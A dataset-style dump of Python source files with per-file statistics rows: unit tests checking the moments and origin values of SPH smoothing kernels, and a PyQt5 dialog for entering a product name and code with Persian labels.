vol = 1.0 / (nx - 1) * 1.0 / (ny - 1)
x, y = np.mgrid[0:1:nx * 1j, 0:1:nx * 1j]
result = np.sum(vfunc(x, y)) * vol
return result
def check_gradient_moment_2d(self, m, n):
x0, y0, z0 = 0.5, 0.5, 0.0
def func(x, y):
fac = pow(x - x0, m) * pow(y - y0, n)
return fac*np.asarray(self.gradient(x, y, 0.0, x0, y0, 0.0, 0.15))
vfunc = np.vectorize(func, otypes=[np.ndarray])
nx, ny = 101, 101
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1)
x, y = np.mgrid[0:1:nx * 1j, 0:1:nx * 1j]
result = np.sum(vfunc(x, y)) * vol
return result
def check_kernel_moment_3d(self, l, m, n):
x0, y0, z0 = 0.5, 0.5, 0.5
def func(x, y, z):
fac = pow(x - x0, l) * pow(y - y0, m) * pow(z - z0, n)
return fac * self.kernel(x, y, z, x0, y0, z0, 0.15)
vfunc = np.vectorize(func)
nx, ny, nz = 51, 51, 51
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1) * 1.0 / (nz - 1)
x, y, z = np.mgrid[0:1:nx * 1j, 0:1:ny * 1j, 0:1:nz * 1j]
result = np.sum(vfunc(x, y, z)) * vol
return result
def check_gradient_moment_3d(self, l, m, n):
x0, y0, z0 = 0.5, 0.5, 0.5
def func(x, y, z):
fac = pow(x - x0, l) * pow(y - y0, m) * pow(z - z0, n)
return fac * np.asarray(self.gradient(x, y, z, x0, y0, z0, 0.15))
vfunc = np.vectorize(func, otypes=[np.ndarray])
nx, ny, nz = 51, 51, 51
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1) * 1.0 / (nz - 1)
x, y, z = np.mgrid[0:1:nx * 1j, 0:1:ny * 1j, 0:1:nz * 1j]
result = np.sum(vfunc(x, y, z)) * vol
return result
def check_kernel_at_origin(self, w_0):
k = self.kernel(xi=0.0, yi=0.0, zi=0.0, xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = w_0
self.assertAlmostEqual(k, expect,
msg='Kernel value %s != %s (expected)'
% (k, expect))
k = self.kernel(xi=3.0, yi=0.0, zi=0.0, xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = 0.0
self.assertAlmostEqual(k, expect,
msg='Kernel value %s != %s (expected)'
% (k, expect))
g = self.gradient(xi=0.0, yi=0.0, zi=0.0,
xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = 0.0
self.assertAlmostEqual(g[0], expect,
msg='Kernel value %s != %s (expected)'
% (g[0], expect))
g = self.gradient(xi=3.0, yi=0.0, zi=0.0,
xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = 0.0
self.assertAlmostEqual(g[0], expect,
msg='Kernel value %s != %s (expected)'
% (g[0], expect))
###############################################################################
# `TestCubicSpline1D` class.
###############################################################################
class TestCubicSpline1D(TestKernelBase):
kernel_factory = staticmethod(lambda: CubicSpline(dim=1))
def test_simple(self):
self.check_kernel_at_origin(2. / 3)
def test_zeroth_kernel_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 8)
# Use a non-unit h.
r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 8)
r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 1.0, 8)
def test_first_kernel_moment(self):
kh = self.wrapper.radius_scale
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 1, xj=0.0)
self.assertAlmostEqual(r, 0.0, 8)
def test_zeroth_grad_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_grad_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 0.0, 8)
# Use a non-unit h.
r = self.check_grad_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 0.0, 8)
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 0.0, 8)
def test_first_grad_moment(self):
kh = self.wrapper.radius_scale
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
self.assertAlmostEqual(r, -1.0, 8)
###############################################################################
# `TestCubicSpline2D` class.
###############################################################################
class TestCubicSpline2D(TestKernelBase):
kernel_factory = staticmethod(lambda: CubicSpline(dim=2))
def test_simple(self):
self.check_kernel_at_origin(10. / (7 * np.pi))
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_2d(0, 0)
self.assertAlmostEqual(r, 1.0, 7)
def test_first_kernel_moment(self):
r = self.check_kernel_moment_2d(0, 1)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_2d(1, 0)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_2d(1, 1)
self.assertAlmostEqual(r, 0.0, 7)
def test_zeroth_grad_moments(self):
r = self.check_gradient_moment_2d(0, 0)
self.assertAlmostEqual(r[0], 0.0, 7)
self.assertAlmostEqual(r[1], 0.0, 7)
def test_first_grad_moment(self):
r = self.check_gradient_moment_2d(1, 0)
self.assertAlmostEqual(r[0], -1.0, 6)
self.assertAlmostEqual(r[1], 0.0, 8)
r = self.check_gradient_moment_2d(0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 6)
r = self.check_gradient_moment_2d(1, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
###############################################################################
# `TestCubicSpline3D` class.
###############################################################################
class TestCubicSpline3D(TestKernelBase):
kernel_factory = staticmethod(lambda: CubicSpline(dim=3))
def test_simple(self):
self.check_kernel_at_origin(1. / np.pi)
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_3d(0, 0, 0)
self.assertAlmostEqual(r, 1.0, 6)
def test_first_kernel_moment(self):
r = self.check_kernel_moment_3d(0, 0, 1)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_3d(0, 1, 0)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_3d(1, 0, 1)
self.assertAlmostEqual(r, 0.0, 7)
def test_zeroth_grad_moments(self):
r = self.check_gradient_moment_3d(0, 0, 0)
self.assertAlmostEqual(r[0], 0.0, 7)
self.assertAlmostEqual(r[1], 0.0, 7)
self.assertAlmostEqual(r[2], 0.0, 7)
def test_first_grad_moment(self):
r = self.check_gradient_moment_3d(1, 0, 0)
self.assertAlmostEqual(r[0], -1.0, 4)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], 0.0, 8)
r = self.check_gradient_moment_3d(0, 1, 0)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 4)
self.assertAlmostEqual(r[2], 0.0, 6)
r = self.check_gradient_moment_3d(0, 0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], -1.0, 4)
###############################################################################
# Gaussian kernel
class TestGaussian1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: Gaussian(dim=1))
def test_simple(self):
self.check_kernel_at_origin(1.0 / np.sqrt(np.pi))
def test_first_grad_moment(self):
kh = self.wrapper.radius_scale
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
self.assertAlmostEqual(r, -1.0, 3)
def test_zeroth_kernel_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 4)
# Use a non-unit h.
r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 4)
r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 1.0, 4)
class TestGaussian2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: Gaussian(dim=2))
def test_simple(self):
self.check_kernel_at_origin(1.0 / np.pi)
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_2d(0, 0)
self.assertAlmostEqual(r, 1.0, 3)
def test_first_grad_moment(self):
r = self.check_gradient_moment_2d(1, 0)
self.assertAlmostEqual(r[0], -1.0, 2)
self.assertAlmostEqual(r[1], 0.0, 8)
r = self.check_gradient_moment_2d(0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 2)
r = self.check_gradient_moment_2d(1, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
class TestGaussian3D(TestCubicSpline3D):
kernel_factory = staticmethod(lambda: Gaussian(dim=3))
def test_simple(self):
self.check_kernel_at_origin(1.0 / pow(np.pi, 1.5))
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_3d(0, 0, 0)
self.assertAlmostEqual(r, 1.0, 2)
def test_first_grad_moment(self):
r = self.check_gradient_moment_3d(1, 0, 0)
self.assertAlmostEqual(r[0], -1.0, 2)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], 0.0, 8)
r = self.check_gradient_moment_3d(0, 1, 0)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 2)
self.assertAlmostEqual(r[2], 0.0, 6)
r = self.check_gradient_moment_3d(0, 0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], -1.0, 2)
###############################################################################
# Quintic spline kernel
class TestQuinticSpline1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: QuinticSpline(dim=1))
def test_simple(self):
self.check_kernel_at_origin(0.55)
class TestQuinticSpline2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: QuinticSpline(dim=2))
def test_simple(self):
self.check_kernel_at_origin(66.0 * 7.0 / (478.0 * np.pi))
class TestQuinticSpline3D(TestGaussian3D):
kernel_factory = staticmethod(lambda: QuinticSpline(dim=3))
def test_simple(self):
self.check_kernel_at_origin(66.0 * 1.0 / (120.0 * np.pi))
###############################################################################
# SuperGaussian kernel
class TestSuperGaussian1D(TestGaussian1D):
kernel_factory = staticmethod(lambda: SuperGaussian(dim=1))
def test_simple(self):
self.check_kernel_at_origin(1.5 / np.sqrt(np.pi))
def test_first_grad_moment(self):
kh = self.wrapper.radius_scale
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
self.assertAlmostEqual(r, -1.0, 2)
def test_zeroth_kernel_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 3)
# Use a non-unit h.
r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 3)
r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 1.0, 3)
class TestSuperGaussian2D(TestGaussian2D):
kernel_factory = staticmethod(lambda: SuperGaussian(dim=2))
def test_simple(self):
self.check_kernel_at_origin(2.0 / np.pi)
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_2d(0, 0)
self.assertAlmostEqual(r, 1.0, 2)
def test_first_grad_moment(self):
r = self.check_gradient_moment_2d(1, 0)
self.assertAlmostEqual(r[0], -1.0, 1)
self.assertAlmostEqual(r[1], 0.0, 8)
r = self.check_gradient_moment_2d(0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 1)
r = self.check_gradient_moment_2d(1, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
class TestSuperGaussian3D(TestGaussian3D):
kernel_factory = staticmethod(lambda: SuperGaussian(dim=3))
def test_simple(self):
self.check_kernel_at_origin(5.0 / (2.0 * pow(np.pi, 1.5)))
def test_first_grad_moment(self):
r = self.check_gradient_moment_3d(1, 0, 0)
self.assertAlmostEqual(r[0], -1.0, 1)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], 0.0, 8)
r = self.check_gradient_moment_3d(0, 1, 0)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 1)
self.assertAlmostEqual(r[2], 0.0, 6)
r = self.check_gradient_moment_3d(0, 0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], -1.0, 1)
###############################################################################
# WendlandQuintic C2 kernel
class TestWendlandQuintic2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: WendlandQuintic(dim=2))
def test_simple(self):
self.check_kernel_at_origin(7.0 / (4.0 * np.pi))
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_2d(0, 0)
self.assertAlmostEqual(r, 1.0, 6)
class TestWendlandQuintic3D(TestGaussian3D):
kernel_factory = staticmethod(lambda: WendlandQuintic(dim=3))
def test_simple(self):
self.check_kernel_at_origin(21.0 / (16.0 * np.pi))
class TestWendlandQuintic1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: WendlandQuinticC2_1D(dim=1))
def test_simple(self):
self.check_kernel_at_origin(5.0 / 8.0)
def test_zeroth_kernel_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 8)
# Use a non-unit h.
r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 7)
r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 1.0, 7)
def test_first_grad_moment(self):
kh = self.wrapper.radius_scale
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
self.assertAlmostEqual(r, -1.0, 7)
###############################################################################
# WendlandQuintic C4 kernel
class TestWendlandQuinticC4_2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: WendlandQuinticC4(dim=2))
def test_simple(self):
self.check_kernel_at_origin(9.0 / (4.0 * np.pi))
class TestWendlandQuinticC4_3D(TestGaussian3D):
kernel_factory = staticmethod(lambda: WendlandQuinticC4(dim=3))
def test_simple(self):
self.check_kernel_at_origin(495.0 / (256.0 * np.pi))
class TestWendlandQuinticC4_1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: WendlandQuinticC4_1D(dim=1))
def test_simple(self):
self.check_kernel_at_origin(3.0 / 4.0)
###############################################################################
# WendlandQuintic C6 kernel
class TestWendlandQuinticC6_2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: WendlandQuinticC6(dim=2))
def test_simple(self):
self.check_kernel_at_origin(78.0 / (28.0 * np.pi))
class TestWendlandQuinticC6_3D(TestGaussian3D):
kernel_factory = staticmethod(lambda: WendlandQuinticC6(dim=3))
def test_simple(self):
self.check_kernel_at_origin(1365.0 / (512.0 * np.pi))
class TestWendlandQuinticC6_1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: WendlandQuinticC6_1D(dim=1))
def test_simple(self):
self.check_kernel_at_origin(55.0 / 64.0)
if __name__ == '__main__':
main()
| 35.996154 | 79 | 0.564911 | 2,677 | 18,718 | 3.796787 | 0.063877 | 0.027548 | 0.177489 | 0.095041 | 0.859406 | 0.821822 | 0.733078 | 0.708678 | 0.701397 | 0.693231 | 0 | 0.069568 | 0.247409 | 18,718 | 519 | 80 | 36.065511 | 0.651949 | 0.023774 | 0 | 0.633423 | 0 | 0 | 0.007934 | 0 | 0 | 0 | 0 | 0 | 0.231806 | 1 | 0.172507 | false | 0 | 0.013477 | 0.010782 | 0.334232 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8669e9b87e5d95bc106309d261510fb35c93f370 | 10,429 | py | Python | design2.py | arashdeveloper1380/Store-software-with-PyQT | 8d379790eae06eae4330faad2a74f1ce57ebdf5e | [
"Apache-2.0"
] | null | null | null | design2.py | arashdeveloper1380/Store-software-with-PyQT | 8d379790eae06eae4330faad2a74f1ce57ebdf5e | [
"Apache-2.0"
] | null | null | null | design2.py | arashdeveloper1380/Store-software-with-PyQT | 8d379790eae06eae4330faad2a74f1ce57ebdf5e | [
"Apache-2.0"
] | null | null | null |
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialogadd(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(366, 162)
Dialog.setMinimumSize(QtCore.QSize(366, 162))
Dialog.setMaximumSize(QtCore.QSize(366, 162))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(230, 244, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(166, 214, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 92, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(68, 123, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(178, 219, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(230, 244, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(166, 214, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 92, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(68, 123, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(178, 219, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 92, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(230, 244, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(166, 214, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 92, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(68, 123, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 92, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 92, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(102, 184, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
Dialog.setPalette(palette)
self.lineEdit = QtWidgets.QLineEdit(Dialog)
self.lineEdit.setGeometry(QtCore.QRect(40, 50, 161, 31))
self.lineEdit.setFrame(True)
self.lineEdit.setObjectName("lineEdit")
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(220, 60, 47, 21))
self.label.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.label.setFrameShadow(QtWidgets.QFrame.Sunken)
self.label.setLineWidth(10)
self.label.setTextFormat(QtCore.Qt.AutoText)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.lineEdit_2 = QtWidgets.QLineEdit(Dialog)
self.lineEdit_2.setGeometry(QtCore.QRect(40, 90, 161, 31))
self.lineEdit_2.setFrame(True)
self.lineEdit_2.setObjectName("lineEdit_2")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(220, 100, 47, 21))
self.label_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.label_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.label_2.setLineWidth(10)
self.label_2.setTextFormat(QtCore.Qt.AutoText)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(40, 130, 231, 23))
self.pushButton.setObjectName("pushButton")
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(0, 10, 361, 31))
self.label_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.label_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.label_3.setLineWidth(10)
self.label_3.setTextFormat(QtCore.Qt.AutoText)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def check_line(self):
self.t1=self.lineEdit.text()
self.t2=self.lineEdit_2.text()
print(self.t1,' ',self.t2)
if (self.t1!='' and self.t2!=''):
return(self.t1,self.t2)
else:
return(-1,-1)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "نام کالا:"))
self.label_2.setText(_translate("Dialog", "کد کالا:"))
self.pushButton.setText(_translate("Dialog", "اضافه شدن"))
self.label_3.setText(_translate("Dialog", "!!! اگر هر دو خط را کامل کنید و مشابه آن موجود نباشد کالا اضافه می شود!!!"))
| 50.139423 | 128 | 0.748777 | 1,351 | 10,429 | 5.754996 | 0.102147 | 0.152154 | 0.092605 | 0.121543 | 0.824051 | 0.803215 | 0.737621 | 0.737621 | 0.737621 | 0.731061 | 0 | 0.047051 | 0.115543 | 10,429 | 207 | 129 | 50.381643 | 0.795859 | 0 | 0 | 0.459184 | 0 | 0 | 0.018493 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015306 | false | 0 | 0.005102 | 0 | 0.02551 | 0.005102 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
867c7204ed439bdc365db2044f59581b9d123f8d | 3,656 | py | Python | emailtemplates/migrations/0001_initial.py | deployed/django-emailtemplates | d33c80843092e397c78e9310fa4858a7bdc25cb6 | [
"MIT"
] | 14 | 2015-11-30T11:19:03.000Z | 2022-02-04T08:28:51.000Z | emailtemplates/migrations/0001_initial.py | deployed/django-emailtemplates | d33c80843092e397c78e9310fa4858a7bdc25cb6 | [
"MIT"
